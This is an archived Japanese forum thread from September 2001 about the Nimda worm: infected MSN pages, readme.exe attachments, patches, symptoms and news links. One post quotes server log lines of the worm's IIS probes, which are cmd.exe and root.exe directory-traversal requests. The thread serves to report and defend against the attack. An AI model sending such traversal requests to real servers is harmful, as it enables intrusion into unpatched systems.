出てますが、どうなんでしょう?
関連スレ
MSNにウィルス添付?
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776
を開くとreadme.exeというファイルがDLするようになってるそうです。
topを読むと送られてきます。
http://www.msn.co.jp/readme.eml
なんでこのファイル、こんなアイコンなんだ。
つーか普通にレスしちゃったけど、>>3のリンクはIEにパッチ
当ててない奴はまずいだろ。
あ、ごめん。ネスケなので気が付かなかったー。
http://www.prland.co.jp/
ここも同じ現象らしいよ。
Admin.dllとか言ってるな。最近はさすがにCodeRedスレ
見てなかったから知らんけど、そこらへんの新種が関係
してんのかね
readme.exeのみのヘッダ教えてチョ
ここもな。
ん?readme.exeのみのヘッダ?
base64デコーダを使え。
IIS使う馬鹿に何が提案できるんだ
RarUty使ってるのだが、base64として認識してくれない(;´Д`)
見直してみたけど、やっぱりtftpとかも書いてあるわ。
突然*.emlファイルが数千作成され、エクスプローラー開くと空き要領が5MB/secくらいの
スピードで減っていった。LANでつないでいるリブレットも同時進行(^^;
実行したんかい(w
それにしても、「不正なMIMEヘッダを含む〜」とCodeRedの
合作かな。なんか面白みないね
しかし>>17のように実行は出来ないw
実は、実行しちゃいました><
readme.exeですが、
concept virs (CV) v5
って文字列が含まれてます。(TT)
concept virsをちょっと、調べてみたのですが、
英語版wordに感染するマクロウィルスらしいです。
何日か前に消しちまったんだった。残念。まあ挙動はバイナリ
みるだけでほとんど書いてあるような気もするが。
ニュース速報って、どこの、ニュース速報?>20
あ、ややこしい書き方でスマソ、ココ(2ch)です。
送信するわけか?だとしたらトラフィックがまた・・・。
一個76.6KBのファイルをガンガン送られたらかなわんな
その128、俺。
ネットワークの方はどうなってる?パケット送りまくり?
Librettoとラブコールしまくりだった。
http://www.microsoft.com/JAPAN/support/kb/articles/JP290/1/08.htm
ん?するとバックドアで入ってweb閲覧者にも送りつけて繁殖?
IE5.01〜5.5限定とはいえ被害が広がるねえ。
そうか、じゃあ後は自分で解析するのも面倒っつーか
意味ないからCodeRedスレのログでも読むかな。
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776&ls=50&nofirst=true
1のスレも読んでみたけど、メディアプレイヤーが立ち上がる?
「不正なMIMEヘッダ〜」に加えて、「MediaPlayerのスキンファイル〜」
の穴も突こうとしてんのかね。出遅れたからわからん。
CodeRedスレの人間教えれ
かなぁ。
http://memo.st.ryukoku.ac.jp/archive/200109.month/thread.html
こいつがでかいファイルを撒き散らしてたわけね
サンクス、ざっと読んできた。また祭りか?とか思ってたけど、
洒落にならん・・・16種類。しかも良く考えたら「不正なMIME〜」は
IEだけじゃなく、OutLookもか・・・
って書いてあるよ?
無差別に撒き散らすとしたら十分すぎるほどでかい
認識甘すぎ・・・・
まぁまぁ、ドンマイドンマイ
それにしても、こんどのコードネームは Nimda か
ARP Floodが〜。1分にARPだけで1025パケット・・・
はぁ〜
メモリリフレッシュするには便利なアイテムだよ
しかし笑い事じゃない。どうでもいいけどこのreadme.exe、
リソース覗いてみたらアイコンが5つ。・・・意味ないぞ
とりあえず今回もJ-COM内からのアタックがガンガン来てる
上にARPの数はさらに増えつつある。とりあえずJ-COMに
メール出しとくか。
結局、脆弱性”Unicode Web Traversal”のパッチは無し?
ってことは、IIS全部感染対象?
URLScanしか方法無いのかなぁ。
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20010914/1/
ワショ-イ
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-078
Scary Hybrid Internet Worm Loose
http://wired.com/news/technology/0,1282,46944,00.html
Nimdaは、先週起こったテロとは関係ないっちゅーことやろ
http://search.fresheye.com/?kw=readme.eml&term=monthly
今日の昼頃には感染サイトが爆発するでしょう。
がんばれしまんてくー。
思ってても、メールから感染したら、やっぱwebページが改竄されるのかなぁ。
感染したPC側はサーバーへのアタックもやるのかな。
それによると思う。
同じウィルスの感染手段が異なるだけのものだとすれば、
Webも改竄されるのでは。
そういえば
http://www.msn.co.jp/
ふっかつしないね、、、。
http://www.prland.co.jp/
このサイトをクリックしたらPCがバリバリバリバリいうようになっちゃったよぉ〜。
もう30以上もつづいているよ。。。
ファイルのダウンロード画面が一瞬出たんだけど、
保存するってやらなくても落ちて来ちゃうの?
対処法はどうすればいいの?
ぁぁぁぁぁああああパニックだよぉぉぉぉぉおおおおお!
Windowsを正しく動作するための必要なファイルが認識できない
バージョンのファイルに置き換えられています。システムの
安定を維持するために、これらのファイルを元のバージョンに
復元する必要があります。
Wndows2000 Professional CD-ROMを挿入してください。
ってなるんだけど、ただCDを入れれば勝手に処理してくれるのんですか?
Map....
っていうお知らせ画面がでてきました。
オレ、msnなんて昔から見たことないから・・・・・
あの錆、めちゃ遅いからね。
いまだに、立ち上げと同時にmsnが表示されたままの人が
多いようだし・・・・
いやいや。
しばらくすると、各社から修復方法が発表になると思うので、
それまでは、予備のPCでやっていた方がいいと思う。
なんだかPCの中にとんでもない悪者が潜んでいそうでとてもコワイです。
含まれてるよね?
ひっかっかっちゃったよヽ(´ー`)ノ 実害出てないけどね。。
そのうちファイルあぼられたりするのかなあ?
昨日だけで34回きた
デスクトプンだけじゃなかったみたい(´Д`)
ファイルのバックアップとっといた方がいいかな?
http://mimizun.mine.nu/
ハードディスクいっぱいにしてくれました。一応、*.emlと*.tmp.exeを削除しました。
でもなぁNTsp6aのIISでSRPあてていたんだが・・・
気のせいかもしれないけどね。あと.eml消せなくなってるよ??
>>77
ご愁傷様。。なんか実害あった?ファイル消されたりするのかなぁ?
意味ないんじゃないの??
CodeRedIIの比じゃないぐらいの割合で。
このemlファイル使った穴を塞ぐパッチって、IE5.5SP2には
含まれてるよね
IE6,0はどうなんでしょうか?
http://headlines.yahoo.co.jp/hl?a=20010919-00000116-jij-bus_all
【シリコンバレー18日時事】「Nimda(ニムダ)」と呼ばれる危険度の高い新種の
コンピューターウイルスが登場し、ウイルス対策会社などが注意を呼び掛けている。
米ウイルス対策大手シマンテックによると、同ウイルスは、電子メールで届けられる添付
ファイル「readme.exe」に潜み、これを利用者が不用意に開くことで感染する。
感染したコンピューターは、ウイルスメールを外部に発信。マイクロソフト製ウェブサーバー
ソフトを利用している他のコンピューターに対して同ソフトのセキュリティーホール
(欠陥)を狙った攻撃を仕掛ける。 (時事通信)[9月19日9時3分更新]
確かめてみたら5.5SP2にはばっちり含まれてた。
悪いんだが6.0はわからん。でも対策されてない気がする
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-075
のことだよね。
これとCodeBlueって関係してんの?
ウチも昨日からアタック受けてるけどあれとMSNのは別物じゃないかな。
^^^^^^^^^^^^^^^^
>コンピューターに対して同ソフトのセキュリティーホール
>(欠陥)を狙った攻撃を仕掛ける。(時事通信)[9月19日9時3分更新]
^^^^^^^^^
これって、損害賠償責任ないの?
210.91.45.224 - - [19/Sep/2001:10:03:50 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 214
210.91.45.224 - - [19/Sep/2001:10:03:57 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 214
210.91.45.224 - - [19/Sep/2001:10:04:05 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 214
210.91.45.224 - - [19/Sep/2001:10:04:10 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
210.91.45.224 - - [19/Sep/2001:10:04:16 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
210.91.45.224 - - [19/Sep/2001:10:04:23 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
210.91.45.224 - - [19/Sep/2001:10:04:30 +0900] "GET /msadc/..%5c../..%5c../..%5c/..チ ../..チ ../..チ ../winnt/system32/cmd.exe HTTP/1.0" 400 205
210.91.45.224 - - [19/Sep/2001:10:04:38 +0900] "GET /scripts/..チ ../winnt/system32/cmd.exe HTTP/1.0" 400 205
HRS-MSG - - [19/Sep/2001:10:10:20 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 233
HRS-MSG - - [19/Sep/2001:10:10:22 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:10:37 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:10:41 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:10:44 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:10:48 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:10:51 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:10:54 +0900] "GET /msadc/..%5c../..%5c../..%5c/..チ ../..チ ../..チ ../winnt/system32/cmd.exe HTTP/1.0" 400 205
HRS-MSG - - [19/Sep/2001:10:10:58 +0900] "GET /scripts/..チ ../winnt/system32/cmd.exe HTTP/1.0" 400 205
HRS-MSG - - [19/Sep/2001:10:11:01 +0900] "GET /sc?/c+dir HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:11:03 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 400 205
HRS-MSG - - [19/Sep/2001:10:11:06 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 400 205
HRS-MSG - - [19/Sep/2001:10:11:09 +0900] "GET /scripts/..5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:11:11 +0900] "GET /scripts/..5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:11:14 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:11:20 +0900] "GET /scripts/..%2f../winnt/system32/cmd.exe HTTP/1.0" 404 214
永遠に続く。重いわけだ。
http://www.zdnet.co.jp/news/0109/19/b_0918_01.html
ありがとうございます。
6.0から5.5にバージョンアップ?と思いつつIEのページからDLしようとしたら
最新バージョンがインストール済みでバージョンアップできませんですって。
こわいよー!
ありとあらゆる実行ファイルにreadme.emlなる文字列が確認されたのでめんどいのでクリーンインストールします。。。
パッチあてめんどいんだよなぁ。
GoBack入れとけば良かったのにな。
うちはGoBackで感染ファイルが根こそぎなくなったわ。よかったよかった。
6から5.5へはません。6へは一方通行です。
お詫びも警告もないな。。。
やっぱりな。。。。
複合的な攻撃、感染機能をもつウィルス Nimda
Nimda=ニダ?
なんて読むニダ
米軍の作戦の1つニダ
http://headlines.yahoo.co.jp/hl?a=20010919-00000002-vgb-sci
TOP カテ一覧 スレ一覧 2ch元 削除依頼 ▲
@nifty 常時安全セキュリティ24 Part 2 (466)
★☆インターネットウイルスプロテクターV4☆★ (346)
ウイルスバスター2006(仮称)ベータ版 Part1 (621)
【電磁波盗聴】TEMPEST【画面盗視】 (794)
毎日ウィルスメールが送られてくるのですが・・2通目 (789)
コンピュータウィルスの研究者集合 (103)
--log9.info------------------
一日一回はタイピング測定Part15 (581)
自治スレ (806)
Project街スレ 進化一 (246)
【無料版】かんたんWebアニメーション【製品版】 (205)
すごい動画や画像を張って自慢するスレ(*゚□゚) オ!! (568)
【もすかう】Moskau‐モスカスレ part2【もすかう】 (902)
【無様・滑稽】のまねこ問題2【モナー信者達w】 (314)
【ヒラメキ】閃 -HIRAMEKI- Part2【イベント】 (295)
BARギコっぽいONLINE Part30 (208)
【性欲の】性欲をもてあます【奴隷達】225発目 (943)
【音ゲー?】太鼓のオワタツジン 3コンボ目 (453)
【祝】いつでも雑談しているスレ29【5周年】 (575)
やわらか戦車の柔らかさについて語るスレ (105)
救世主猫ってナイトメアシティのパクリ? (580)
+++AfterEffects総合スレ+++ (299)
FLASHゲーム攻略スレPart50 (239)
--log55.com------------------
【都合により】目処きゅうんヲチスレ3
【進化心理学】Ore Chang(エボサイ)の生態観察スレ【サピ超え太郎】
CM3D2 ツイッターヲチスレ 18
惚気界隈25
【高尚トレパク】五助ヲチ【女総長】
【医クラの有名な荒らし】混血エリナ【孤立無援】Part6
しばき隊ファンクラブ避難所7(ワッチョイ有)
洋画なりきり自作自演ババア
